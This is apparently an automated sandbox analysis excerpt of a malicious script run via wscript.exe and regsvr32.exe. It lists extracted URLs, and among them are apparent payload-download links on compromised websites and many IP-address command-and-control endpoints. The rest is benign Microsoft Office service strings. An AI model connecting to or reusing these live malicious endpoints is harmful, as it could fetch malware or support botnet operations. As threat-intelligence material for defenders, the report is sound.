                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 187.63.160.88
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 167.172.199.165
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 164.90.222.65
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                    Source: wscript.exe, 00000001.00000003.387940812.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416607803.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410465872.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412962434.0000000005BF6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526872204.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.468360047.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526636042.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.468128599.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.527014017.0000000000CC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526872204.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.468360047.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526636042.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: regsvr32.exe, 00000004.00000003.464689702.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.465342984.0000000002D69000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.465703835.0000000002D69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?90aacf9173a90
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                    Source: wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/
                    Source: wscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ozmeydan.com/cekici/9/xM
                    Source: wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/
                    Source: wscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://softwareulike.com/cWIYxWMPkK/yM
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                    Source: wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.00000000058E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399047863.0000000005863000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394230105.000000000578B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405910637.0000000005967000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.00000000059E7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400148476.00000000058CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405867233.00000000059C9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394601502.00000000057AB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.415892369.0000000005968000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408129613.0000000005AC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393277198.00000000056D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416390329.0000000005B9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393894273.0000000005771000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393446805.00000000056CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.406352017.0000000005985000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/
                    Source: wscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://1.234.2.232:8080/S
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.43.75.120/P
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.43.75.120/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://103.43.75.120/xqnhpb/M
                    Source: regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://107.170.39.149:8080/
                    Source: regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://107.170.39.149:8080/$
                    Source: regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://107.170.39.149:8080/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.131.28:8080/
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://149.56.131.28:8080/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://159.89.202.34:443/xqnhpb/b/
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000CC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://160.16.142.56:8080/xqnhpb/eX
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000CC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://163.44.196.120:8080/
                    Source: regsvr32.exe, 00000004.00000003.526636042.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000003.527014017.0000000000CC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://167.172.199.165:8080/xqnhpb/#U
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://169.57.156.166:8080/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000003.526872204.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526636042.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/
                    Source: regsvr32.exe, 00000004.00000003.526872204.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526636042.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/0/
                    Source: regsvr32.exe, 00000004.00000003.526872204.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526636042.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/G
                    Source: regsvr32.exe, 00000004.00000003.526872204.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526636042.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://182.162.143.56/xqnhpb/J
                    Source: regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://186.194.240.217/xqnhpb//
                    Source: regsvr32.exe, 00000004.00000003.527014017.0000000000CC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.172.199.165:8080/
                    Source: regsvr32.exe, 00000004.00000003.526636042.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/
                    Source: regsvr32.exe, 00000004.00000003.526872204.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.526636042.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://187.63.160.88:80/#
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://203.239.212.5/
                    Source: regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://206.189.28.199:8080/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://213.239.212.5///
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://213.239.212.5/080/k
                    Source: regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://213.239.212.5/xqnhpb/l
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://213.239.212.5/xqnhpb/v
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://213.239.212.5:443/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.235.8.30:8080/
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.235.8.30:8080/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.235.8.30:8080/xqnhpb//
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.235.8.30:8080/xqnhpb/b/4
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://72.15.201.15:8080/xqnhpb/1Y
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://82.223.21.224:8080/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/
                    Source: regsvr32.exe, 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000003.526872204.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/xqnhpb/%%
                    Source: regsvr32.exe, 00000004.00000003.468128599.0000000000CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/xqnhpb/Z
                    Source: regsvr32.exe, 00000004.00000002.884803420.0000000000C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.121.146.47:8080/xqnhpb/tG
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/
                    Source: regsvr32.exe, 00000004.00000002.884919905.0000000000D06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/_
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.885733730.0000000002D5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.207.28.33:8080/xqnhpb/
                    Source: regsvr32.exe, 00000004.00000002.885918510.0000000002EF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://91.235.8.30:8080/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.aadrm.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.aadrm.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.cortana.ai
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.diagnostics.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.microsoftstream.com/api/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.office.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.onedrive.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://api.scheduler.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://apis.live.net/v5.0/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://augloop.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://augloop.office.com/v2
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
                    Source: wscript.exe, wscript.exe, 00000001.00000003.393259366.00000000056E4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.416528586.0000000005BCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408026023.0000000005A06000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.405664335.00000000059F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.393226362.0000000005711000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.392299007.000000000570C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.408902760.0000000005AFF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399568142.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.414126316.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.400542411.0000000005928000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.401268867.00000000059A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.412516217.0000000005A36000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409762682.0000000005B87000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.399201970.00000000058F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.410581041.0000000005BCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.387940812.0000000005BB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.394922574.00000000057FF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.395880464.00000000057D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.397247854.000000000583C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/
                    Source: wscript.exe, 00000001.00000003.409054917.0000000005B3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.409368396.0000000005B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dll
                    Source: wscript.exe, 00000001.00000003.410811834.00000000053B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cdn.entity.
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cdn.hubblecontent.osi.office.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cdn.int.designerapp.osi.office.net/fonts
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://clients.config.office.net/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://config.edge.skype.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://consent.config.office.com/consentcheckin/v1.0/consents
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://consent.config.office.com/consentweb/v1.0/consents
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cortana.ai
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cortana.ai/api
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://cr.office.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://d.docs.live.net
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.o365filtering.com
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.o365filtering.com/
                    Source: 0FA10290-6778-4D86-943C-754A19FE889E.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
